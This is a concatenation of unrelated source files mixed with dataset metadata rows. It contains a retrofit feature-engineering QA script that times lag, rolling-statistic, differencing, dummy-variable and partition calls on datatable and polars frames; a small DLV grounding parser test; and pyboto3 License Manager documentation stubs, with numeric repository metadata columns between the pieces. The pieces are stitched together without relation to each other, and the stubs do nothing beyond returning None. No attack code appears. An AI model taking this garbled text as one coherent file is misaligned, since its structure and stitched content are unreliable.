Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=1, LagColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], ImputeValue=-1.0, Sort=True, Processing='polars', InputFrame='polars', OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
data2 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data2.columns)
print(ArgsList)
# # Args
# ArgsList=None
# LagPeriods=1
# LagColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# ImputeValue=-1.0
# Sort=True
# Processing='polars'
# InputFrame='polars'
# OutputFrame='polars'
## Group and Multiple Periods and LagColumnNames: datatable
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=[1,3,5], LagColumnNames=['Leads','XREGS1'], DateColumnName='CalendarDateColumn', ByVariables=['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data1 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data1.names)
print(ArgsList)
# # Args
# ArgsList=None
# LagPeriods=[1,3,5]
# LagColumnNames=['Leads','XREGS1']
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
## Group and Multiple Periods and LagColumnNames: polars
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=[1,3,5], LagColumnNames=['Leads','XREGS1'], DateColumnName='CalendarDateColumn', ByVariables=['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], ImputeValue=-1.0, Sort=True, Processing='polars', InputFrame='polars', OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
data2 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data2.columns)
print(ArgsList)
# # Args
# ArgsList=None
# LagPeriods=[1,3,5]
# LagColumnNames=['Leads','XREGS1']
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# ImputeValue=-1.0
# Sort=True
# Processing='polars'
# InputFrame='polars'
# OutputFrame='polars'
#########################################################################################################
#########################################################################################################
# QA FE0_AutoRollStats
# Manual QA of rolling-statistics feature engineering: times each call
# and prints the resulting column names plus the returned ArgsList.
import timeit
import datatable as dt
import polars as pl
from retrofit import FeatureEngineering as fe
## No Group Example
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoRollStats(data=data, ArgsList=None, RollColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=None, MovingAvg_Periods=[3,5,7], MovingSD_Periods=[3,5,7], MovingMin_Periods=[3,5,7], MovingMax_Periods=[3,5,7], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# RollColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=None
# MovingAvg_Periods=[3,5,7]
# MovingSD_Periods=[3,5,7]
# MovingMin_Periods=[3,5,7]
# MovingMax_Periods=[3,5,7]
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
## No Group Example
# NOTE(review): data is read with polars here, but the call below still
# passes Processing/InputFrame/OutputFrame='datatable'; the Args notes
# after it say 'polars' — likely the call was meant to use 'polars'.
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoRollStats(data=data, ArgsList=None, RollColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=None, MovingAvg_Periods=[3,5,7], MovingSD_Periods=[3,5,7], MovingMin_Periods=[3,5,7], MovingMax_Periods=[3,5,7], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# RollColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=None
# MovingAvg_Periods=[3,5,7]
# MovingSD_Periods=[3,5,7]
# MovingMin_Periods=[3,5,7]
# MovingMax_Periods=[3,5,7]
# ImputeValue=-1
# Sort=True
# Processing='polars'
# InputFrame='polars'
# OutputFrame='polars'
## Group and Multiple Periods and RollColumnNames:
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoRollStats(data=data, ArgsList=None, RollColumnNames=['Leads','XREGS1'], DateColumnName='CalendarDateColumn', ByVariables=['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], MovingAvg_Periods=[3,5,7], MovingSD_Periods=[3,5,7], MovingMin_Periods=[3,5,7], MovingMax_Periods=[3,5,7], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# RollColumnNames=['Leads','XREGS1']
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# MovingAvg_Periods=[3,5,7]
# MovingSD_Periods=[3,5,7]
# MovingMin_Periods=[3,5,7]
# MovingMax_Periods=[3,5,7]
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
## No Group Example:
# NOTE(review): this scenario duplicates the first datatable scenario above.
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoRollStats(data=data, ArgsList=None, RollColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=None, MovingAvg_Periods=[3,5,7], MovingSD_Periods=[3,5,7], MovingMin_Periods=[3,5,7], MovingMax_Periods=[3,5,7], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# RollColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=None
# MovingAvg_Periods=[3,5,7]
# MovingSD_Periods=[3,5,7]
# MovingMin_Periods=[3,5,7]
# MovingMax_Periods=[3,5,7]
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
#########################################################################################################
#########################################################################################################
# QA FE0_AutoDiff
# Manual QA of differencing feature engineering (datatable only).
import timeit
import datatable as dt
from datatable import sort, f, by
import retrofit
from retrofit import FeatureEngineering as fe
## Group Example:
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoDiff(data=data, ArgsList=None, DateColumnName = 'CalendarDateColumn', ByVariables = ['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], DiffNumericVariables = 'Leads', DiffDateVariables = 'CalendarDateColumn', DiffGroupVariables = None, NLag1 = 0, NLag2 = 1, Sort=True, Processing = 'datatable', InputFrame = 'datatable', OutputFrame = 'datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# DateColumnName = 'CalendarDateColumn'
# ByVariables = ['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# DiffNumericVariables = 'Leads'
# DiffDateVariables = 'CalendarDateColumn'
# DiffGroupVariables = None
# NLag1 = 0
# NLag2 = 1
# Sort=True
# Processing = 'datatable'
# InputFrame = 'datatable'
# OutputFrame = 'datatable'
## Group and Multiple Periods and RollColumnNames:
# NOTE(review): despite the header, this call is identical to the Group
# Example above (single numeric variable, same lags).
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoDiff(data=data, ArgsList=None, DateColumnName = 'CalendarDateColumn', ByVariables = ['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], DiffNumericVariables = 'Leads', DiffDateVariables = 'CalendarDateColumn', DiffGroupVariables = None, NLag1 = 0, NLag2 = 1, Sort=True, Processing = 'datatable', InputFrame = 'datatable', OutputFrame = 'datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# DateColumnName = 'CalendarDateColumn'
# ByVariables = ['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# DiffNumericVariables = 'Leads'
# DiffDateVariables = 'CalendarDateColumn'
# DiffGroupVariables = None
# NLag1 = 0
# NLag2 = 1
# Sort=True
# Processing = 'datatable'
# InputFrame = 'datatable'
# OutputFrame = 'datatable'
## No Group Example:
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoDiff(data=data, ArgsList=None, DateColumnName = 'CalendarDateColumn', ByVariables = None, DiffNumericVariables = 'Leads', DiffDateVariables = 'CalendarDateColumn', DiffGroupVariables = None, NLag1 = 0, NLag2 = 1, Sort=True, Processing = 'datatable', InputFrame = 'datatable', OutputFrame = 'datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# DateColumnName = 'CalendarDateColumn'
# ByVariables = None
# DiffNumericVariables = 'Leads'
# DiffDateVariables = 'CalendarDateColumn'
# DiffGroupVariables = None
# NLag1 = 0
# NLag2 = 1
# Sort=True
# Processing = 'datatable'
# InputFrame = 'datatable'
# OutputFrame = 'datatable'
#########################################################################################################
#########################################################################################################
# QA FE1_AutoCalendarVariables
# (original header comment said "FE0_AutoDiff" — copy/paste leftover;
# this section exercises calendar-variable generation)
import timeit
import datatable as dt
from datatable import sort, f, by
import retrofit
from retrofit import FeatureEngineering as fe
# FE1_AutoCalendarVariables
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE1_AutoCalendarVariables(data=data, ArgsList=None, DateColumnNames = 'CalendarDateColumn', CalendarVariables = ['wday','mday','wom','month','quarter','year'], Processing = 'datatable', InputFrame = 'datatable', OutputFrame = 'datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
# NOTE(review): this section prints the original frame's names; unlike
# the other sections, Output is not unpacked here.
print(data.names)
#########################################################################################################
#########################################################################################################
# QA FE1_DummyVariables: one-hot/dummy encoding of categorical columns,
# exercised with both the datatable and the polars backends.
# Example: datatable
import timeit
import datatable as dt
import retrofit
from retrofit import FeatureEngineering as fe
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE1_DummyVariables(
  data=data,
  ArgsList=None,
  CategoricalColumnNames=['MarketingSegments','MarketingSegments2'],
  Processing='datatable',
  InputFrame='datatable',
  OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
# Example: polars
import retrofit
from retrofit import FeatureEngineering as fe
import polars as pl
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE1_DummyVariables(
  data=data,
  ArgsList=None,
  CategoricalColumnNames=['MarketingSegments','MarketingSegments2'],
  Processing='polars',
  InputFrame='polars',
  OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
#########################################################################################################
#########################################################################################################
# FE2_AutoDataParition
# QA of train/validation/test partitioning ("Parition" [sic] matches the
# library's function name).  Exercises random and time-based partitioning
# with both the datatable and polars backends; each call returns a dict
# with 'TrainData', 'ValidationData', 'TestData' and 'ArgsList' keys.
import timeit
import datatable as dt
import polars as pl
import retrofit
from retrofit import FeatureEngineering as fe
from retrofit import utils as u
# datatable random Example
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
DataSets = fe.FE2_AutoDataParition(
  data=data,
  ArgsList=None,
  DateColumnName='CalendarDateColumn',
  PartitionType='random',
  Ratios=[0.70,0.20,0.10],
  Sort = False,
  ByVariables=None,
  Processing='datatable',
  InputFrame='datatable',
  OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
ArgsList = DataSets['ArgsList']
# data=data
# ArgsList=None
# DateColumnName='CalendarDateColumn'
# PartitionType='random'
# Ratios=[0.70,0.20,0.10]
# Sort = False
# ByVariables=None
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
# polars random Example
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
DataSets = fe.FE2_AutoDataParition(
  data=data,
  ArgsList=None,
  DateColumnName='CalendarDateColumn',
  PartitionType='random',
  Ratios=[0.70,0.20,0.10],
  ByVariables=None,
  Sort = False,
  Processing='polars',
  InputFrame='polars',
  OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
ArgsList = DataSets['ArgsList']
# data=data
# ArgsList=None
# DateColumnName='CalendarDateColumn'
# PartitionType='random'
# Ratios=[0.70,0.20,0.10]
# Sort = False
# ByVariables=None
# Processing='polars'
# InputFrame='polars'
# OutputFrame='polars'
# datatable time Example
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
DataSets = fe.FE2_AutoDataParition(
  data=data,
  ArgsList=None,
  DateColumnName='CalendarDateColumn',
  PartitionType='time',
  Ratios=[0.70,0.20,0.10],
  Sort = True,
  ByVariables=None,
  Processing='datatable',
  InputFrame='datatable',
  OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
ArgsList = DataSets['ArgsList']
# data=data
# ArgsList=None
# DateColumnName='CalendarDateColumn'
# PartitionType='time'
# Ratios=[0.70,0.20,0.10]
# Sort = True
# ByVariables=None
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
# polars time Example
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
DataSets = fe.FE2_AutoDataParition(
  data=data,
  ArgsList=None,
  DateColumnName='CalendarDateColumn',
  PartitionType='time',
  Ratios=[0.70,0.20,0.10],
  ByVariables=None,
  Sort = True,
  Processing='polars',
  InputFrame='polars',
  OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
ArgsList = DataSets['ArgsList']
# data=data
# ArgsList=None
# DateColumnName='CalendarDateColumn'
# PartitionType='time'
# Ratios=[0.70,0.20,0.10]
# Sort = True
# ByVariables=None
# Processing='polars'
# InputFrame='polars'
# OutputFrame='polars'
# Cast every column of the (polars) frame to Categorical, then sort by date.
# Fixes vs. the original snippet:
#  - `for i in data.shape[1]` iterated over an int (TypeError) -> range(...)
#  - the `if` line was missing its trailing colon (SyntaxError)
#  - `DateColumnName` was undefined at this point; bound to the
#    'CalendarDateColumn' value used throughout this script.
# NOTE(review): depending on the polars version, `Series.dtype` may be a
# class rather than an instance, in which case `data[i].dtype != pl.Categorical`
# would be the intended check — confirm against the pinned polars version.
DateColumnName = 'CalendarDateColumn'
for i in range(data.shape[1]):
    if not isinstance(data[i].dtype, pl.Categorical):
        data[i] = data[i].cast(pl.Categorical)
data.sort(DateColumnName, reverse = False, in_place = True)
| 33.964286
| 421
| 0.71572
| 2,099
| 19,020
| 6.396379
| 0.061934
| 0.017876
| 0.053627
| 0.023834
| 0.961195
| 0.961195
| 0.961195
| 0.958886
| 0.948086
| 0.929093
| 0
| 0.018226
| 0.091325
| 19,020
| 559
| 422
| 34.025045
| 0.758607
| 0.27571
| 0
| 0.948905
| 0
| 0
| 0.223362
| 0.07857
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.116788
| null | null | 0.171533
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5941d48d565f0d8cd6c7e74b039f2807bc1987c
| 735
|
py
|
Python
|
tests/parser/grounding.8.simplified.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.8.simplified.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.8.simplified.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
# Parser grounding QA fixture: a DLV2/ASP program supplied as parser
# input.  (`input` shadows the builtin, but renaming would change the
# fixture's interface.)
input = """
att_val(perGrant,name,nameCG).
att_val(perGrant,name,nameGrant).
att_val(nameCG,lastName,"Grant").
att_val(nameGrant,lastName,"Leach").
acted(perGrant,m12).
involved(P,M) :- acted(P,M).
matchingMovie(q1, m12).
inferred_topic(X5, X1) :- matchingMovie(X5, X4), involved(X3, X4), att_val(X3, name, X2), att_val(X2, lastName, X1).
"""
# Expected simplified output — byte-identical to the input program for
# this test case.
output = """
att_val(perGrant,name,nameCG).
att_val(perGrant,name,nameGrant).
att_val(nameCG,lastName,"Grant").
att_val(nameGrant,lastName,"Leach").
acted(perGrant,m12).
involved(P,M) :- acted(P,M).
matchingMovie(q1, m12).
inferred_topic(X5, X1) :- matchingMovie(X5, X4), involved(X3, X4), att_val(X3, name, X2), att_val(X2, lastName, X1).
"""
| 19.864865
| 117
| 0.668027
| 106
| 735
| 4.5
| 0.235849
| 0.150943
| 0.1174
| 0.150943
| 0.976939
| 0.976939
| 0.976939
| 0.976939
| 0.976939
| 0.976939
| 0
| 0.047393
| 0.138776
| 735
| 36
| 118
| 20.416667
| 0.706161
| 0
| 0
| 0.9
| 0
| 0.1
| 0.955903
| 0.375533
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5f5a6438107ba3b569498d324c3893a7272f60a
| 57,120
|
py
|
Python
|
pyboto3/licensemanager.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/licensemanager.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/licensemanager.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def can_paginate(operation_name=None):
    """Return whether the given operation supports pagination.

    :type operation_name: string
    :param operation_name: Name of the client method, e.g. ``create_foo``
        for an operation invoked as ``client.create_foo(**kwargs)``.  If
        the operation can be paginated you can use
        ``client.get_paginator('create_foo')``.
    """
    # Auto-generated documentation stub — no runtime implementation.
    pass
def create_license_configuration(Name=None, Description=None, LicenseCountingType=None, LicenseCount=None, LicenseCountHardLimit=None, LicenseRules=None, Tags=None, ProductInformationList=None):
    """Create an AWS License Manager license configuration.

    A license configuration abstracts a customer license agreement that
    License Manager can consume and enforce: the counted dimension
    (vCPU, Instance, Core or Socket), allowed tenancy, host affinity,
    and the number of licenses purchased and used.

    See also: AWS API Documentation

    :type Name: string
    :param Name: [REQUIRED] Name of the license configuration.
    :type Description: string
    :param Description: Description of the license configuration.
    :type LicenseCountingType: string
    :param LicenseCountingType: [REQUIRED] Dimension used to track the
        license inventory: ``'vCPU'|'Instance'|'Core'|'Socket'``.
    :type LicenseCount: integer
    :param LicenseCount: Number of licenses managed by the configuration.
    :type LicenseCountHardLimit: boolean
    :param LicenseCountHardLimit: Whether license enforcement is hard
        (exceeding the limit blocks new instance launches) or soft.
    :type LicenseRules: list
    :param LicenseRules: License rules of the form ``#name=value`` (for
        example ``#allowedTenancy=EC2-DedicatedHost``); the available
        rules vary by dimension (Cores/Instances/Sockets/vCPUs).
    :type Tags: list
    :param Tags: Tags to add, each a dict with ``'Key'`` and ``'Value'``.
    :type ProductInformationList: list
    :param ProductInformationList: Product information entries, each a
        dict with ``'ResourceType'`` (value ``SSM_MANAGED``) and a
        ``'ProductInformationFilterList'`` of filter dicts
        (``ProductInformationFilterName`` / ``...Value`` / ``...Comparator``).
    :rtype: dict
    :return: ``{'LicenseConfigurationArn': 'string'}``

    Raises (when backed by a real client):
    LicenseManager.Client.exceptions.InvalidParameterValueException,
    ServerInternalException, ResourceLimitExceededException,
    AuthorizationException, AccessDeniedException,
    RateLimitExceededException.
    """
    # Auto-generated documentation stub — no runtime implementation.
    pass
def delete_license_configuration(LicenseConfigurationArn=None):
    """Delete the specified license configuration.

    A license configuration that is still in use cannot be deleted.

    See also: AWS API Documentation

    :type LicenseConfigurationArn: string
    :param LicenseConfigurationArn: [REQUIRED] ID of the license
        configuration to delete.
    :rtype: dict
    :return: ``{}``

    Raises (when backed by a real client):
    LicenseManager.Client.exceptions.InvalidParameterValueException,
    ServerInternalException, AuthorizationException,
    AccessDeniedException, RateLimitExceededException.
    """
    # Auto-generated documentation stub — no runtime implementation.
    pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
    """Generate a presigned URL for a client method and its arguments.

    :type ClientMethod: string
    :param ClientMethod: The client method to presign for.
    :type Params: dict
    :param Params: The parameters normally passed to ClientMethod.
    :type ExpiresIn: int
    :param ExpiresIn: Number of seconds the presigned URL remains valid;
        by default it expires in an hour (3600 seconds).
    :type HttpMethod: string
    :param HttpMethod: HTTP method to use on the generated URL; by
        default, whatever method the operation's model uses.
    """
    # Auto-generated documentation stub — no runtime implementation.
    pass
def get_license_configuration(LicenseConfigurationArn=None):
    """
    Gets detailed information about the specified license configuration.

    See also: AWS API Documentation

    :type LicenseConfigurationArn: string
    :param LicenseConfigurationArn: [REQUIRED] Amazon Resource Name (ARN)
        of the license configuration.
    :rtype: dict
    :return: A dict describing the license configuration, with keys:

        - LicenseConfigurationId (string): unique ID for the configuration.
        - LicenseConfigurationArn (string): ARN of the configuration.
        - Name (string), Description (string)
        - LicenseCountingType: 'vCPU' | 'Instance' | 'Core' | 'Socket' --
          dimension on which the licenses are counted.
        - LicenseRules (list of string): license rules.
        - LicenseCount (integer): number of available licenses.
        - LicenseCountHardLimit (boolean): whether the available license
          count is a hard limit.
        - ConsumedLicenses (integer): number of licenses assigned to resources.
        - Status (string), OwnerAccountId (string)
        - ConsumedLicenseSummaryList (list of dict): per-resource-type
          consumption, each with 'ResourceType'
          ('EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE')
          and 'ConsumedLicenses' (integer).
        - ManagedResourceSummaryList (list of dict): each with 'ResourceType'
          and 'AssociationCount' (integer).
        - Tags (list of dict): each with 'Key' and 'Value' strings.
        - ProductInformationList (list of dict): each with 'ResourceType'
          (the value is SSM_MANAGED) and 'ProductInformationFilterList'
          (dicts of 'ProductInformationFilterName',
          'ProductInformationFilterValue' (list of string),
          'ProductInformationFilterComparator'). Supported filters (logical
          operator EQUALS unless noted): Application Name, Application
          Publisher, Application Version, Platform Name, Platform Type, and
          License Included (EQUALS / NOT_EQUALS; possible values are
          sql-server-enterprise | sql-server-standard | sql-server-web |
          windows-server-datacenter).
        - AutomatedDiscoveryInformation (dict): {'LastRunTime': datetime} --
          time that automated discovery last ran.

    Raises:
        LicenseManager.Client.exceptions.InvalidParameterValueException
        LicenseManager.Client.exceptions.ServerInternalException
        LicenseManager.Client.exceptions.AuthorizationException
        LicenseManager.Client.exceptions.AccessDeniedException
        LicenseManager.Client.exceptions.RateLimitExceededException
    """
    # Documentation stub only; the real call is dispatched by botocore at runtime.
    return None
def get_paginator(operation_name=None):
    """
    Create a paginator for an operation.

    :type operation_name: string
    :param operation_name: The operation name. This is the same name as the
        method name on the client. For example, if the method name is
        create_foo, and you'd normally invoke the operation as
        client.create_foo(**kwargs), if the create_foo operation can be
        paginated, you can use the call client.get_paginator('create_foo').
    :rtype: L{botocore.paginate.Paginator}
    :return: A paginator object.
    """
    # Documentation stub only; the real call is dispatched by botocore at runtime.
    return None
def get_service_settings():
    """
    Gets the License Manager settings for the current Region.

    See also: AWS API Documentation

    :rtype: dict
    :return: A dict with keys:

        - S3BucketArn (string): Regional S3 bucket path for storing reports,
          license trail event data, discovery data, and so on.
        - SnsTopicArn (string): SNS topic configured to receive notifications
          from License Manager.
        - OrganizationConfiguration (dict): {'EnableIntegration': bool} --
          indicates whether AWS Organizations has been integrated with
          License Manager for cross-account discovery.
        - EnableCrossAccountsDiscovery (boolean): whether cross-account
          discovery has been enabled.
        - LicenseManagerResourceShareArn (string): ARN of the AWS resource
          share. The License Manager master account will provide member
          accounts with access to this share.

    Raises:
        LicenseManager.Client.exceptions.ServerInternalException
        LicenseManager.Client.exceptions.AuthorizationException
        LicenseManager.Client.exceptions.AccessDeniedException
        LicenseManager.Client.exceptions.RateLimitExceededException
    """
    # Documentation stub only; the real call is dispatched by botocore at runtime.
    return None
def get_waiter(waiter_name=None):
    """
    Returns an object that can wait for some condition.

    :type waiter_name: str
    :param waiter_name: The name of the waiter to get. See the waiters
        section of the service docs for a list of available waiters.
    :rtype: botocore.waiter.Waiter
    """
    # Documentation stub only; the real call is dispatched by botocore at runtime.
    return None
def list_associations_for_license_configuration(LicenseConfigurationArn=None, MaxResults=None, NextToken=None):
    """
    Lists the resource associations for the specified license configuration.

    Resource associations need not consume licenses from a license
    configuration. For example, an AMI or a stopped instance might not
    consume a license (depending on the license rules).

    See also: AWS API Documentation

    :type LicenseConfigurationArn: string
    :param LicenseConfigurationArn: [REQUIRED] Amazon Resource Name (ARN)
        of a license configuration.
    :type MaxResults: integer
    :param MaxResults: Maximum number of results to return in a single call.
    :type NextToken: string
    :param NextToken: Token for the next set of results.
    :rtype: dict
    :return: A dict with keys:

        - LicenseConfigurationAssociations (list of dict): each association
          has 'ResourceArn' (string), 'ResourceType'
          ('EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE'),
          'ResourceOwnerId' (string -- ID of the AWS account that owns the
          resource consuming licenses), and 'AssociationTime' (datetime --
          time when the license configuration was associated with the
          resource).
        - NextToken (string): token for the next set of results.

    Raises:
        LicenseManager.Client.exceptions.InvalidParameterValueException
        LicenseManager.Client.exceptions.FilterLimitExceededException
        LicenseManager.Client.exceptions.ServerInternalException
        LicenseManager.Client.exceptions.AuthorizationException
        LicenseManager.Client.exceptions.AccessDeniedException
        LicenseManager.Client.exceptions.RateLimitExceededException
    """
    # Documentation stub only; the real call is dispatched by botocore at runtime.
    return None
